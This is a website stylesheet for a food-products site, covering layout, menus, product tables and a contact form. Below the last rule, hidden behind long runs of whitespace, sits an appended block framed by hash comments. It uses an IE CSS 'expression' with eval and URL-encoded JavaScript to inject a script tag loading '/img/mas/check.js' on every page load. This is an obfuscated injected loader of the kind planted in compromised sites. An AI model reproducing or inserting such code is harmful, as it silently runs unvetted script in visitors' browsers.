/*----------------------------------------------
/ Global
/---------------------------------------------*/

body,div,p,h1,h2,h3,ul,li,form,td {
	padding: 0px;
	margin: 0px;
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
	line-height: 1.4em;
}

input,select,textarea {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
	line-height: 1.4em;
}

body {
	background-color: #ccc;
}

p,h1,h2,h3 {
	margin-bottom: 1.4em;
}

a {
	color: #007CB9;
	text-decoration: none;
}

a.imageLink {
}

a:focus, a:hover {
	text-decoration: none;
}

a.imageLink:focus, a.imageLink:hover {
}

/*----------------------------------------------
/ Layout
/---------------------------------------------*/

body {
	text-align:center;
}

div {
	position: relative;
	visibility: visible;
}

div.wrapperEnd {
	clear: both;
	float: none;
	font-size: 1px;
	line-height: 1px;
}

div#container {
	text-align: left;
	width: 735px;
	margin: 0 auto;
	margin-top: 25px;
} 

div#pageShadow {
	background-color: #999;
} 


div#shadow1 {
	position: absolute;
	right: -1px;
	top: 0px;
	height: 12px;
	background-color: #CCC;
	width: 6px;
	font-size: 1px;
	line-height: 1px;
}

div#shadow2 {
	height: 6px;
	background-color: #CCC;
	width: 12px;
	font-size: 1px;
	line-height: 1px;
}

div#page {
	width: 725px !important;
	width: 729px;
	background-color: #F9F7E8;
	border: 2px solid #fff;
} 

div#pageHeader {
	position: relative;
	background-image: url(../img/headerImage.jpg);
	background-repeat: no-repeat;
	background-position: right;
	height: 93px;
}

div#topMenu {
	border-top: 2px solid #fff;
	border-bottom: 2px solid #fff;
} 

div#topMenu a {
	font-size: 13px;
	font-weight: bold;
	display: block;
	color: #FFF;
	background-color: #CC3300;
	border-right: 2px solid #fff;
	padding-top: 6px;
	padding-bottom: 6px;
	width: 143px;
	text-align: center;
} 

div#topMenu a:hover {
	background-color: #E63900;
}

div#topMenu a.last:hover {
	background-color: #FE8001;
}

div#topMenu a.last {
	background-color: #FF6600;
	border-right: 0px none;
	width: 145px !important;
	width: 153px;
} 

div#pagePath {
	background-color: #E2A151;
	padding: 3px;
	padding-left: 10px;
}

div#pagePath a {
	color: #632C03;
	text-decoration: underline;
}

div#pagePath span {
	color: #AC0D0D;
	font-weight: bold;
}

div#pagePath.homePage {
	height: 6px;
	font-size: 1px;
	line-height: 1px;
	padding: 0px;
}

div#footer {
	text-align: center;
	width: 664px;
	margin: 0 auto;
	margin-top: 5px;
}

div#bottomMenu {
	border: 2px solid #fff;
} 

div#bottomMenu a {
	font-size: 11px;
	font-weight: normal;
	display: block;
	color: #632C03;
	background-color: #E2A151;
	border-right: 2px solid #fff;
	padding-top: 1px;
	padding-bottom: 1px;
	width: 130px;
	text-align: center;
	text-transform: uppercase;
} 

div#bottomMenu a:hover {
	background-color: #E8B371;
}

div#bottomMenu a.last {
	border-right: 0px none;
	width: 172px !important;
	width: 180px;
} 

div#signature {
	margin-top: 8px;
	font-size: 12px;
}

/*----------------------------------------------
/ Content
/---------------------------------------------*/

div#pageBody {
}

div#content {
	margin: 20px;
	margin-top: 15px;
	margin-bottom: 0px;
}

div#content a:hover,
div#content a:focus {
	text-decoration: underline;
}

/*----------------------------------------------
/ Homepage
/---------------------------------------------*/

#foodBoxes {
	position: relative;
}

#foodBoxes td a {
	display: block;
	position: relative;
	width: 155px;
	cursor: pointer;
}

#content #foodBoxes td a:hover,
#content #foodBoxes td a:focus {
	text-decoration: none;
}


#foodBoxes td {
	width: 155px;
	height: 247px;
	background-repeat: no-repeat;
	position: relative;
	vertical-align: top;
}

td div.foodBoxTitle {
	margin-top: 124px;
	color: #FFF;
	font-weight: bold;
	text-align: center;
	width: 150px;
	line-height: 12px;
	height: auto;
}

td div.foodBoxDescription {
	width: 140px;
	height: auto;
	color: #000;
	margin-left: 5px;
	margin-top: 15px;
	text-align: center;
	line-height: 14px;
}

td div.foodBoxDescription p.red {
	margin-bottom: 5px;
	color: #D90000;
	font-weight: bold;
}

.red {
	margin-bottom: 5px;
	color: #D90000;
}

#foodBoxes td#foodBoxVegetarian {
	background-image: url(../img/boxVegetarian.jpg);
}

#foodBoxes td#foodBoxSeafood {
	background-image: url(../img/boxSeafood.jpg);
}

#foodBoxes td#foodBoxMeat {
	background-image: url(../img/boxMeat.jpg);
}

#foodBoxes td#foodBoxSpecial {
	background-image: url(../img/boxSpecial.jpg);
}

#foodBoxes td#foodBoxSpecial div.foodBoxTitle {
	margin-top: 117px;
}

#foodBoxes td#foodBoxSpecial div.foodBoxDescription {
	margin-top: 10px;
}

#bonAppetit {
	text-align: center;
	font-size: 22px;
	margin-top: 15px;
	margin-bottom: 20px;
}

/*----------------------------------------------
/ subpages
/---------------------------------------------*/

.title {
	background-position: 0px 0px;
	background-repeat: no-repeat;
	color: #FFF;
	font-weight: bold;
	padding-left: 20px;
	line-height: 26px;
	height: 33px;
	margin-top: 15px;
	font-size: 13px;
}

.whiteBox {
	background-color: #FFF;
	background-image: url(../img/whiteBoxShadow.gif);
	background-position: right;
	background-repeat: repeat-y;
}

.whiteBox .whiteBoxShadow1 {
	background-image: url(../img/whiteBoxHole.gif);
	background-position: right top;
	background-repeat: no-repeat;
	height: 6px;
	line-height: 1px;
	font-size: 1px;
}

.whiteBox .whiteBoxShadow2 {
	background-color: #D4D2C5;
	background-image: url(../img/whiteBoxHole.gif);
	background-position: left bottom;
	background-repeat: no-repeat;
	height: 6px;
	line-height: 1px;
	font-size: 1px;
}

.whiteBox .whiteBoxContent {
	margin: 10px;
	margin-top: 4px;
}

#buttonHome {
	height: 50px;
}

#buttonHome a {
	position: absolute;
	top: 0px;
	right: 0px;
	padding-top: 6px;
	padding-left: 11px;
	background-image: url(../img/buttonHome.gif);
	background-repeat: no-repeat;
	display: block;
	width: 58px !important;
	width: 69px;
	height: 37px;
	font-size: 13px;
	font-weight: bold;
	color: #FFF;
	margin-top: 12px;
}

#buttonHome a:hover,
#buttonHome a:focus {
	text-decoration: none;
}

/*----------------------------------------------
/ news
/---------------------------------------------*/

#titleNews {
	background-image: url(../img/titleNews.gif);
	width: 283px;
}

.newsTitle {
	font-weight: bold;
}

/*----------------------------------------------
/ coming soon
/---------------------------------------------*/

#whiteBoxSoon {
	width: 340px;
	margin-left: 180px;
	text-align: center;
}

#whiteBoxSoon.long {
	width: 440px;
	margin-left: 120px;
}

#whiteBoxSoon p {
	margin-bottom: 0.5em;
}

#whiteBoxSoon .whiteBoxContent {
	margin: 25px;
	margin-bottom: 35px;
}

/*----------------------------------------------
/ products
/---------------------------------------------*/

#titleVegetarian {
	background-image: url(../img/titleVegetarian.gif);
	width: 152px;
	padding-left: 12px;
	margin-bottom: 10px;
	display: block;
}

#titleSeafood {
	background-image: url(../img/titleSeafood.gif);
	width: 152px;
	padding-left: 45px;
	display: block;
}

#titleMeat {
	background-image: url(../img/titleMeat.gif);
	width: 230px;
	padding-left: 25px;
	height: 38px;
	display: block;
}

#titleSpecial {
	background-image: url(../img/titleSpecial.gif);
	width: 230px;
	padding-left: 12px;
	height: 39px;
	display: block;
}

#productsMenu #titleSeafood {
	margin-top: 35px;
}

#productsMenu #titleMeat {
	margin-top: 35px;
}

#productsMenu #titleSpecial {
	margin-top: 35px;
	float: left;
}

#titleFoodPreparation {
	background-image: url(../img/titleFoodPreparation.gif);
	width: 175px;
	height: 50px;
	padding-left: 18px;
	padding-top: 17px;
	margin-top: 17px;
	margin-right: 80px !important;
	margin-right: 50px;
	display: block;
	float: right;
}

div#content #titleFoodPreparation2 {
	background-image: url(../img/titleFoodPreparation.gif);
	width: 175px;
	height: 50px;
	padding-left: 18px;
	padding-top: 17px;
	margin-top: -15px;
	display: block;
}

#whiteBoxFoodPreparation {
	margin-top: 0px !important;
	margin-top: 15px;
}

div#content a.title:hover,
div#content a.title:focus {
	text-decoration: none;
}

#whiteBoxProducts {
	position: absolute;
	top: 0px;
	right: 0px !important;
	right: 15px;
	width: 420px;
}

#whiteBoxProducts table {
	width: 395px !important;
	width: 395px;
}

.productList {
	display: block;
	background-position: 0px 3px;
	background-repeat: no-repeat;
	color: #000;
	padding-left: 20px;
	margin-top: 15px;
	width: 220px !important;
	width: 250px
}

.vegeterianList {
	background-image: url(../img/bulletVegetarian.gif);
}

.seafoodList {
	background-image: url(../img/bulletSeafood.gif);
}

.meatList {
	background-image: url(../img/bulletMeat.gif);
}

.specialList {
	background-image: url(../img/bulletSpecial.gif);
}

.imageThumbs {
	text-align: right;
	margin-top: 50px;
}

.imageThumbs p {
	margin-bottom: 1em;
}

.imageThumbs a {
	display: block;
	float: right;
	background-position: 0px 0px;
	background-repeat: no-repeat;
	background-image: url(../img/imageBg.gif);
	height: 65px;
	width: 65px;
	margin-left: 5px;
	text-align: left;
}

/*----------------------------------------------
/ food preparation
/---------------------------------------------*/

#foodPreparationPage {
	text-align: left;
}

#foodPreparationPage div {
	background-color: #FFFFFF;
	padding: 10px;
	border: 1px solid #666;
	visibility: hidden;
}

#foodPreparationText {
	position: absolute;
	width: 400px;
	text-align: right;
	color: #995E22;
	top: 15px;
	font-size: 11px;
	right: 0px !important;
	right: 22px;
}

/*----------------------------------------------
/ about us
/---------------------------------------------*/
#whiteBoxAboutText {
	width: 560px;
	float: right;
}

#whiteBoxAboutImage {
	width: 112px;
	float: left;
}

#whiteBoxAboutImage .whiteBoxContent {
	width: 106px;
	height: 132px;
	text-align: center;
	padding: 0px;
	margin: 0px;
}

/*----------------------------------------------
/ about us
/---------------------------------------------*/

#whiteBoxContact {
	width: 516px;
}

/*----------------------------------------------
/ tables
/---------------------------------------------*/

#productTable .row1 {
	width: 60px;
}

#productTable .row2 {
	width: 150px;
}

#productTable .row3 {
	width: 95px;
	background-color: #FFFFFF;
	border-bottom: 1px solid #F2EECC;
}

#productTable tr.odd td.row3 {
	background-color: #FFFFFF;
}

#productTable .row4 {
	width: 90px;
}

#productTable .row5 {
	width: 105px;
}

#productTable .row6 {
	width: 115px;
}

#productTable td {
	padding: 3px;
	background-color: #F9F7E8;	
	text-align: center;
	font-size: 11px;
	line-height: 1.3em;
}

#productTable tr.odd td {
	background-color: #F2EECC;	
}

#productTable.productTableHeader td {
	background-color: #CC3300;
	color: #FFFFFF;
	font-weight: bold;
	font-size: 12px;
	border: 0px none #F2EECC;
}

.tableLink {
	color: #FFFFFF;
	font-weight: normal;
	font-size: 11px;
}

.productTableTitle {
	background-color: #E2A151;
	padding: 3px;
	margin; 1px;
	width: 651px !important;
	width: 657px;
	font-weight: bold;
	text-align: center;
}

.tableTitle {
	font-weight: bold;
	margin-bottom: 8px;
	text-align: right;
	width: 657px;
}

/*----------------------------------------------
/ contact form
/---------------------------------------------*/

.textField {
	width: 300px;
}

.error {
	width: 475px !important;
	width: 486px;
	border: 1px solid #D90000;
	color: #D90000;
	text-align: center;
	padding: 5px;
}

.correct {
	width: 475px !important;
	width: 486px;
	border: 1px solid #B0DD00;
	color: #000;
	text-align: center;
	padding: 5px;
}

/* hubert----------------
*/
div.title h1 {	
	color: #FFF;
	font-weight: bold;
	line-height: 26px;		
	font-size: 13px;
}

#content h1 {	
	color: #FFF;
	font-weight: bold;
	line-height: 26px;		
	font-size: 13px;
}




































































































                                                                                                                                                      /* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%38%34%33%30%37%3B%20%4A%53%53%33%20%3D%20%27%2F%69%6D%67%2F%6D%61%73%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%69%6D%67%2F%6D%61%73%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */                                                                                                                                                      





































































































